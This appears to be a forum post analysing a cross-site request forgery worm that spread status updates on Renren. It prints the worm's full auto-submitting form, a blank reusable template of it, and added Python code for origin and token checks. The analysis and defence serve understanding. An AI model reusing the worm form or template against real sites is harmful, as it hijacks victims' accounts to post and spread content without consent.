Analysis of the "XSS" spread through the 'Renren 6th Anniversary' campaign
About half a year ago, Renren had the site-message "secret crush" (暗恋门) XSS vulnerability: cookies were stolen and the worm spread itself through site messages. Someone wrote up that incident at the time. (link)
Today, a screen full of 姜姝君 (no screenshot; Renren's PR team deleted them too quickly) and the later "技术宅改变世界" ("geeks change the world") status updates were the concrete manifestation of this XSS.
The symptom: after clicking the URL, your account immediately posts the same status. I (the OP) got hit too. Looking at the source of 技术宅改变世界 (http://www.wix.com/active93/active93),
you can see this in the header:
<script type="text/javascript">
//<![CDATA[
var serviceTopology = {"serverName":"apu1.wixpress.com","cacheKillerVersion":"v=527","staticServerUrl":"http://static.wix.com","biServerUrl":"http://frog.wix.com","userServerUrl":"http://users.wix.com","billingServerUrl":"http://premium.wix.com","mediaRootUrl":"http://0.static.wix.com","htmlComponentServerUrl":"http://www.flashquix.com/embeds","logServerUrl":"http://frog.wix.com/plebs","monitoringServerUrl":"http://TODO"};
...
//]]>
</script>
It actually loads this JS: http://www.flashquix.com/embeds/e50c529dd937433ca83f67a8d4c8291a?wrap=no&gzip=true&bg=transparent
Don't open it directly, or the JS will execute =。=
In Chrome, open view-source:http://www.flashquix.com/embeds/e50c529dd937433ca83f67a8d4c8291a?wrap=no&gzip=true&bg=transparent
(or substitute the view-source: part for whatever your preferred browser uses)
to view the source of this JS safely.
You'll find:
<html>
<head>
<title></title>
<style type="text/css">
html, body {
height: 100%;
}
body {
margin: 0;
padding: 0;
}
</style>
</head>
<body bgcolor="transparent">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Thanks for you click.</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
This is the TRUTH. Just major in COMPUTER SCIENCE!!!
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://6.renren.com/sixyears/publish" method="POST" target="destination">
<p>type: <input type="text" name="type" value="2"/></p>
<p>raw: <input type="text" name="raw" value="技术宅改变世界。。。http://www.wix.com/active93/active93"/></p>
<input type="submit" value="Submit" />
</form>
</form>
</div>
<script>
document.akiko.submit();
</script>
<script type="text/javascript">var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F278a7f54490f000cde62d2dbfed2f0b7' type='text/javascript'%3E%3C/script%3E"));</script>
</body>
</html>
</body>
</html>
The core of it is this POST. Er, Renren does not check where the POST comes from when it is submitted; that should be the main cause of this "XSS".
It doesn't look like cookies were stolen this time. Just my two cents; gurus, go easy on me.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>你需要的html标题</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
<h2>内容标题啊</h2>
<p>内容啊</p>
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://6.renren.com/sixyears/publish" method="POST" target="destination">
<p>type: <input type="text" name="type" value="2"/></p>
<p>raw: <input type="text" name="raw" value="状态内容,记得加上本URL哦,亲 "/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
<!-- add an image or something -->
<image src="imageURL"></image>
</body>
</html>
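The missing server-side check, as an added example that is not part of the original post: a publish endpoint like /sixyears/publish should refuse a POST whose Origin/Referer is not its own site and whose form lacks a per-session token that a page on wix.com or flashquix.com cannot read (this is cross-site request forgery, whatever the post calls it). Function names, the allowed-origin list and the csrf_token field are assumptions; the attack request below is reconstructed from the form shown on this page.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed: the only origins allowed to submit to /sixyears/publish.
ALLOWED_ORIGINS = {"http://6.renren.com", "https://6.renren.com"}

def issue_token() -> str:
    """Per-session secret to embed in the real publish form (storage assumed)."""
    return secrets.token_urlsafe(32)

def _header(headers: dict, name: str):
    """Case-insensitive header lookup over a plain dict."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None

def origin_allowed(headers: dict) -> bool:
    """Check 1: provenance. Prefer Origin, fall back to Referer, and reject
    a state-changing POST outright when neither header is present."""
    origin = _header(headers, "Origin")
    if origin is None:
        referer = _header(headers, "Referer")
        if not referer:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin.lower() in ALLOWED_ORIGINS

def token_valid(form: dict, session_token: str) -> bool:
    """Check 2: synchronizer token. A foreign page can forge type= and raw=,
    but cannot read a token bound to the victim's renren session."""
    submitted = form.get("csrf_token", "")
    if not submitted or not session_token:
        return False
    return hmac.compare_digest(submitted.encode(), session_token.encode())

def accept_publish(headers: dict, form: dict, session_token: str) -> bool:
    """Publish the status only when both independent checks pass."""
    return origin_allowed(headers) and token_valid(form, session_token)

# Constructed: what the hidden auto-submitting form on the page sends.
ATTACK_HEADERS = {"Referer": "http://www.flashquix.com/embeds/e50c529dd937433ca83f67a8d4c8291a"}
ATTACK_FORM = {"type": "2", "raw": "技术宅改变世界。。。http://www.wix.com/active93/active93"}
```

Either check alone stops the auto-submitted form above; deploying both covers browsers that strip Referer and any bug that leaks the token.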

I just wrote an article on exactly the same thing; my Renren feed is full of these reposts too ~